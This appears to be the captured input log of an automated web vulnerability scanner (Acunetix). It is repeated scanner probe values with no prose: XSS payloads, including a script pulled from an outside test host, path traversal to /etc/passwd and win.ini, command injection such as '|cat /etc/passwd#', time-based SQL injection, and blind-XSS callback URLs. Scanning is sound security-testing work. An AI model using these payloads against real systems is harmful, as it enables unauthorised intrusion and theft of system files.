http://www.acunetix.tst

H1bz6BII'))

comments

1

1

1

'&dir&'

1

<!--

1

WEB-INF/web.xml

1

1

1

comments/.

1'"()&%<ScRiPt >prompt(964725)</ScRiPt>

WEB-INF\web.xml

1

1

"&dir&"

'"()&%<ScRiPt >prompt(991760)</ScRiPt>

1

1

1

|dir

1

../../../../../../../../../../windows/win.ini

1

1_947471

1

1

1

'|dir

acu3841\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca3841

../../../../../../../../../../boot.ini

1

1

1

"|dir

../../../../../../../../../../windows/win.ini.jpg

1

acux2525\xc0\xbez1\xc0\xbcz2a\x90bcxuca2525

1

1

1

1<ScRiPt >prompt(965610)</ScRiPt>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

................windowswin.ini

1

1<script>prompt(923209)</script>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(954409)</ScRiPt>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?947556></ScRiPt>

1

1

1

1<ScRiPt >prompt(909084)</ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

1

1<video><source onerror="javascript:prompt(909109)">

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

response.write(9645528*9528670)

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(938541)"></g></svg>

'+response.write(9645528*9528670)+'

1

1

1

1<div style=width:expression(prompt(924156))>

&cat /etc/passwd&

WEB-INF/web.xml

1

1

"+response.write(9645528*9528670)+"

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

'&cat /etc/passwd&'

1<iframe src='data:text/html

WEB-INF\web.xml

../../../../../../../../../../etc/passwd

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1<body onload=prompt(902728)>

"&cat /etc/passwd&"

-1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

-1)

cat /etc/passwd

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(957521)>

../../../../../../../../../../etc/passwd.jpg

1

1

1

1

1

`cat /etc/passwd`

-1))

1<img src=xyz OnErRor=prompt(952120)>

${99864+99099}

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1<img/src=">" onerror=alert(937528)>

qnT0KJkf'

|cat /etc/passwd#

1&n961183=v980027

1

1some_inexistent_file_with_long_name%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

1<ScRiPt%20>prompt(979276)</sCripT>

Ax7oae8F')

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

)

1

'|'ld

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

FHfr4AYG'))

1&lt

1

testasp.vulnweb.com

!(()&&!|*|*|

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

"|"ld

1

-1

^(#$!@#$)(()))******

1

1

'"()

\xf6<img acu onmouseover=prompt(900083) //\xf6>

/etc/passwd

-1)

'

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1<input autofocus onfocus=prompt(935477)>

1

1

-1))

"

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

'

1

1

1

QMnHZDH9'

${@print(md5(acunetix_wvs_security_test))}

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

<a href='http://www.acunetix.com'>website security</a>

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

1

"

Jff3s15M')

[url=http://www.acunetix.com]website security[/url]

${@print(md5(acunetix_wvs_security_test))}\

1

1

http://hitv7qNeb9Hya.bxss.me/

file:///etc/passwd

Yd8YV6kd'))

1

1

||cat /etc/passwd

acunetix_wvs_invalid_filename

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1_wLIVD <ScRiPt >prompt(960593)</ScRiPt>

1

1

&dir

1

1

1

/\../\../\../\../\../\../\../etc/passwd

comments

1

1

1

1

http://www.acunetix.tst

'&dir&'

1

'"

1

comments

WEB-INF/web.xml

1

"&dir&"

1

1'"()&%<ScRiPt >prompt(954776)</ScRiPt>

1

1

<!--

1

WEB-INF\web.xml

1

comments/.

|dir

1

1

1

'"()&%<ScRiPt >prompt(991999)</ScRiPt>

1

../../../../../../../../../../windows/win.ini

'|dir

1

1

../../../../../../../../../../boot.ini

1

1_953400

1

"|dir

1

../../../../../../../../../../windows/win.ini.jpg

acu5209\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca5209

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1

acux3524\xc0\xbez1\xc0\xbcz2a\x90bcxuca3524

................windowswin.ini

1

1

1

1<ScRiPt >prompt(977498)</ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<script>prompt(964991)</script>

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt >prompt(903022)</ScRiPt>

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?919378></ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<ScRiPt >prompt(942045)</ScRiPt>

1

1

WEB-INF/web.xml

1

1<video><source onerror="javascript:prompt(935074)">

1

response.write(9292506*9817948)

WEB-INF\web.xml

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(924790)"></g></svg>

1

1

1

'+response.write(9292506*9817948)+'

&cat /etc/passwd&

1

1<div style=width:expression(prompt(971153))>

1

1

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9292506*9817948)+"

1

1

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1<iframe src='data:text/html

"&cat /etc/passwd&"

1

1

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

1

1

cat /etc/passwd

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1<body onload=prompt(914986)>

1

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

SomeCustomInjectedHeader:injected_by_wvs

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(959635)>

-1

`cat /etc/passwd`

1

../../../../../../../../../../etc/passwd.jpg

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

-1)

1<img src=xyz OnErRor=prompt(962721)>

${100464+99412}

1

|cat /etc/passwd#

1

1

1&n904074=v939481

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

-1))

1some_inexistent_file_with_long_name%00.jpg

1

1

1

'|'ld

1<img/src=">" onerror=alert(999912)>

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

nnVrv4MK'

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

)

1

1<ScRiPt%20>prompt(947639)</sCripT>

"|"ld

testasp.vulnweb.com

!(()&&!|*|*|

/../..//../..//../..//../..//../..//etc/passwd.jpg

S8SpCID2')

1

1

1

'"()

1&lt

'

1

vQGF8oEs'))

http://testasp.vulnweb.com/t/xss.html?%00.jpg

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

^(#$!@#$)(()))******

"

\xf6<img acu onmouseover=prompt(900372) //\xf6>

'

1

1

-1

1

/etc/passwd

1

1

${@print(md5(acunetix_wvs_security_test))}

1

-1)

1

"

1<input autofocus onfocus=prompt(979504)>

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

${@print(md5(acunetix_wvs_security_test))}\

1

-1))

1

1

<a href='http://www.acunetix.com'>website security</a>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

||cat /etc/passwd

http://hithzjzDCAA3X.bxss.me/

MAM9XqVz'

acunetix_wvs_invalid_filename

1

1

1

vdgYXr5E')

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

[url=http://www.acunetix.com]website security[/url]

&dir

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

7nQxxjOl'))

1

1

comments

1

1

'&dir&'

1_IBSHD <ScRiPt >prompt(980205)</ScRiPt>

1

comments

1

'"

http://www.acunetix.tst

1

1'"()&%<ScRiPt >prompt(964660)</ScRiPt>

1

1

file:///etc/passwd

"&dir&"

comments/.

1

1

1

<!--

'"()&%<ScRiPt >prompt(974353)</ScRiPt>

1

1

|dir

1

/\../\../\../\../\../\../\../etc/passwd

1

1

1

1_983360

1

'|dir

1

1

1

WEB-INF/web.xml

"|dir

1

1

1

1

acu7776\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca7776

WEB-INF\web.xml

1

1

1

acux2230\xc0\xbez1\xc0\xbcz2a\x90bcxuca2230

1

../../../../../../../../../../windows/win.ini

1

1

1

1

1<ScRiPt >prompt(958804)</ScRiPt>

../../../../../../../../../../boot.ini

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1<script>prompt(902240)</script>

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt >prompt(946818)</ScRiPt>

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?989889></ScRiPt>

................windowswin.ini

1

1

1<ScRiPt >prompt(986645)</ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<video><source onerror="javascript:prompt(934995)">

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

response.write(9589111*9999986)

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(973773)"></g></svg>

1

'+response.write(9589111*9999986)+'

&cat /etc/passwd&

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

"+response.write(9589111*9999986)+"

1<div style=width:expression(prompt(965514))>

1

'&cat /etc/passwd&'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

SomeCustomInjectedHeader:injected_by_wvs

1

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

"&cat /etc/passwd&"

../../../../../../../../../../etc/passwd

1<iframe src='data:text/html

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<body onload=prompt(908727)>

cat /etc/passwd

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

WEB-INF/web.xml

1

1

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd.jpg

${99738+99108}

-1

`cat /etc/passwd`

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(985518)>

WEB-INF\web.xml

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

-1)

1

1<img src=xyz OnErRor=prompt(953539)>

1

|cat /etc/passwd#

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1&n932230=v925418

-1))

1some_inexistent_file_with_long_name%00.jpg

1

1<img/src=">" onerror=alert(924743)>

/../..//../..//../..//../..//../..//etc/passwd.jpg

'|'ld

1

)

1

1

1

1<ScRiPt%20>prompt(969123)</sCripT>

Sgc9jsIs'

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

"|"ld

1

!(()&&!|*|*|

1

/etc/passwd

vqzruGd1')

testasp.vulnweb.com

1&lt

'

1

^(#$!@#$)(()))******

'

1

'"()

\xf6<img acu onmouseover=prompt(970558) //\xf6>

"

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

d18tEaXs'))

1

1

1

"

1

1<input autofocus onfocus=prompt(950618)>

||cat /etc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

-1

1

1

1

&dir

1

<a href='http://www.acunetix.com'>website security</a>

${@print(md5(acunetix_wvs_security_test))}

1

1

1

-1)

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

'&dir&'

${@print(md5(acunetix_wvs_security_test))}\

http://hitHhAa8GBoNO.bxss.me/

1

[url=http://www.acunetix.com]website security[/url]

1

acunetix_wvs_invalid_filename

"&dir&"

-1))

1

1

1

1_hdTNb <ScRiPt >prompt(983554)</ScRiPt>

1

1

file:///etc/passwd

1

ZVjPzU47'

|dir

comments

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

/\../\../\../\../\../\../\../etc/passwd

1

http://www.acunetix.tst

1

1

1

1

'|dir

comments

g74mhTqj')

WEB-INF/web.xml

1

1

1

'"

1

1'"()&%<ScRiPt >prompt(984402)</ScRiPt>

vm04AMTz'))

comments/.

WEB-INF\web.xml

"|dir

1

1

'"()&%<ScRiPt >prompt(985581)</ScRiPt>

1

<!--

1

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

1_908273

../../../../../../../../../../boot.ini

1

1

1

1

1

1

1

acu8973\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8973

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

acux6327\xc0\xbez1\xc0\xbcz2a\x90bcxuca6327

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<ScRiPt >prompt(905468)</ScRiPt>

................windowswin.ini

1

1

1

1<script>prompt(933951)</script>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt >prompt(950046)</ScRiPt>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?936295></ScRiPt>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<ScRiPt >prompt(969726)</ScRiPt>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<video><source onerror="javascript:prompt(950650)">

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(977264)"></g></svg>

1

1

1

WEB-INF/web.xml

1

response.write(9488334*9318352)

1<div style=width:expression(prompt(945334))>

1

WEB-INF\web.xml

1

'+response.write(9488334*9318352)+'

1

1

1<iframe src='data:text/html

1

1

"+response.write(9488334*9318352)+"

&cat /etc/passwd&

1

1<body onload=prompt(941098)>

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../etc/passwd

'&cat /etc/passwd&'

1

1

SomeCustomInjectedHeader:injected_by_wvs

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(999119)>

1

1

1

1

"&cat /etc/passwd&"

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1<img src=xyz OnErRor=prompt(917254)>

1

1

1

-1)

../../../../../../../../../../etc/passwd.jpg

1

cat /etc/passwd

1&n970092=v916417

1<img/src=">" onerror=alert(988900)>

${99788+99504}

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1<ScRiPt%20>prompt(975632)</sCripT>

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

-1))

1

`cat /etc/passwd`

1

1some_inexistent_file_with_long_name%00.jpg

1

1

1&lt

|cat /etc/passwd#

)

Ct1UhCKG'

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

\xf6<img acu onmouseover=prompt(951910) //\xf6>

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

!(()&&!|*|*|

'|'ld

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

'"()

G0QCqcAQ')

'

1<input autofocus onfocus=prompt(955881)>

"|"ld

testasp.vulnweb.com

^(#$!@#$)(()))******

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

cKtHvg1Y'))

<a href='http://www.acunetix.com'>website security</a>

"

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

1

1

-1

1

'

1

${@print(md5(acunetix_wvs_security_test))}

[url=http://www.acunetix.com]website security[/url]

/etc/passwd

1

-1)

1

1

1

1_S6ftP <ScRiPt >prompt(921566)</ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

"

http://hit2rD5R53nZe.bxss.me/

1

acunetix_wvs_invalid_filename

1

1

-1))

1

||cat /etc/passwd

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

comments

1

w6WVIoEx'

1

1

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

&dir

WTiGWl29')

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

comments

1

1

4Gqu2WWW'))

'&dir&'

1

1

1

http://www.acunetix.tst

'"

1

comments/.

1

1

1

1'"()&%<ScRiPt >prompt(992226)</ScRiPt>

"&dir&"

1

1

file:///etc/passwd

1

<!--

|dir

'"()&%<ScRiPt >prompt(998739)</ScRiPt>

1

1

1

1

1

/\../\../\../\../\../\../\../etc/passwd

'|dir

1

1_991881

1

1

1

"|dir

WEB-INF/web.xml

acu2416\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2416

1

1

1

WEB-INF\web.xml

1

acux3213\xc0\xbez1\xc0\xbcz2a\x90bcxuca3213

1

1

../../../../../../../../../../windows/win.ini

1

1

1<ScRiPt >prompt(952873)</ScRiPt>

../../../../../../../../../../boot.ini

1

1

1<script>prompt(928171)</script>

1

../../../../../../../../../../windows/win.ini.jpg

1

1<ScRiPt >prompt(949987)</ScRiPt>

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?998152></ScRiPt>

1

................windowswin.ini

1

1

1<ScRiPt >prompt(908352)</ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1<video><source onerror="javascript:prompt(994320)">

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(948883)"></g></svg>

1

response.write(9061276*9590518)

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

&cat /etc/passwd&

1<div style=width:expression(prompt(954737))>

1

1

'+response.write(9061276*9590518)+'

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1<iframe src='data:text/html

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

"+response.write(9061276*9590518)+"

../../../../../../../../../../etc/passwd

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

"&cat /etc/passwd&"

1<body onload=prompt(998034)>

1

SomeCustomInjectedHeader:injected_by_wvs

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(921874)>

cat /etc/passwd

1

-1)

1

../../../../../../../../../../etc/passwd.jpg

SomeCustomInjectedHeader:injected_by_wvs

1

WEB-INF/web.xml

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

${100131+100177}

1<img src=xyz OnErRor=prompt(923224)>

`cat /etc/passwd`

-1))

WEB-INF\web.xml

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1some_inexistent_file_with_long_name%00.jpg

FT0lq1od'

1

|cat /etc/passwd#

1<img/src=">" onerror=alert(984510)>

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1&n992540=v907555

wSluam4x')

1

'|'ld

1<ScRiPt%20>prompt(989707)</sCripT>

)

1

testasp.vulnweb.com

1

dPYRX4Jp'))

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

"|"ld

1

!(()&&!|*|*|

1

1&lt

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

-1

\xf6<img acu onmouseover=prompt(921774) //\xf6>

'"()

1

^(#$!@#$)(()))******

1

'

1<input autofocus onfocus=prompt(920158)>

-1)

/etc/passwd

1

'

1

1

"

1

1

<a href='http://www.acunetix.com'>website security</a>

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

"

1

-1))

http://testasp.vulnweb.com/t/xss.html?%00.jpg

[url=http://www.acunetix.com]website security[/url]

1

||cat /etc/passwd

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}

1

1

P0AOopfU'

1_2echv <ScRiPt >prompt(914322)</ScRiPt>

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

&dir

http://hit0N9Dd18vDh.bxss.me/

1

1

QnCiAI1Z')

acunetix_wvs_invalid_filename

${@print(md5(acunetix_wvs_security_test))}\

1

1

1

'&dir&'

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

comments

qiQScajM'))

1

file:///etc/passwd

"&dir&"

http://www.acunetix.tst

1

1

1

/\../\../\../\../\../\../\../etc/passwd

1

'"

comments

1

1

1

1'"()&%<ScRiPt >prompt(983013)</ScRiPt>

|dir

WEB-INF/web.xml

1

1

<!--

1

comments/.

WEB-INF\web.xml

'"()&%<ScRiPt >prompt(940125)</ScRiPt>

'|dir

1

1

1

1

1

"|dir

1

1

1_971716

../../../../../../../../../../windows/win.ini

1

1

1

1

../../../../../../../../../../boot.ini

1

1

acu2558\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2558

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

acux5085\xc0\xbez1\xc0\xbcz2a\x90bcxuca5085

1

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<ScRiPt >prompt(986902)</ScRiPt>

1

1

1

................windowswin.ini

1<script>prompt(995827)</script>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt >prompt(908265)</ScRiPt>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?983208></ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt >prompt(954875)</ScRiPt>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<video><source onerror="javascript:prompt(914040)">

response.write(9102913*9654870)

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(977151)"></g></svg>

1

&cat /etc/passwd&

1

1

WEB-INF/web.xml

'+response.write(9102913*9654870)+'

1<div style=width:expression(prompt(957438))>

'&cat /etc/passwd&'

1

1

1<iframe src='data:text/html

"+response.write(9102913*9654870)+"

WEB-INF\web.xml

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

SomeCustomInjectedHeader:injected_by_wvs

1

1

"&cat /etc/passwd&"

../../../../../../../../../../etc/passwd

1<body onload=prompt(938329)>

1

SomeCustomInjectedHeader:injected_by_wvs

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(947777)>

cat /etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1

-1

${99805+99816}

1

`cat /etc/passwd`

1<img src=xyz OnErRor=prompt(935007)>

../../../../../../../../../../etc/passwd.jpg

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

-1)

1

1

1

|cat /etc/passwd#

1

-1))

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1<img/src=">" onerror=alert(901446)>

1some_inexistent_file_with_long_name%00.jpg

1

'|'ld

1

)

1&n900330=v971513

4rI4eaCS'

"|"ld

1<ScRiPt%20>prompt(924845)</sCripT>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

51e398wE')

!(()&&!|*|*|

1

'"()

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1&lt

32smuk1o'))

1

testasp.vulnweb.com

\xf6<img acu onmouseover=prompt(953545) //\xf6>

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

'

http://testasp.vulnweb.com/t/xss.html?%00.jpg

^(#$!@#$)(()))******

1

-1

1

'

1

1<input autofocus onfocus=prompt(904588)>

/etc/passwd

"

1

1

-1)

1

1

"

1

<a href='http://www.acunetix.com'>website security</a>

http://hitFX07Q5lNuN.bxss.me/

||cat /etc/passwd

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

-1))

1

${@print(md5(acunetix_wvs_security_test))}

1

[url=http://www.acunetix.com]website security[/url]

acunetix_wvs_invalid_filename

&dir

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

${@print(md5(acunetix_wvs_security_test))}\

1

aPrxeULn'

1

1_NfDV9 <ScRiPt >prompt(905309)</ScRiPt>

1

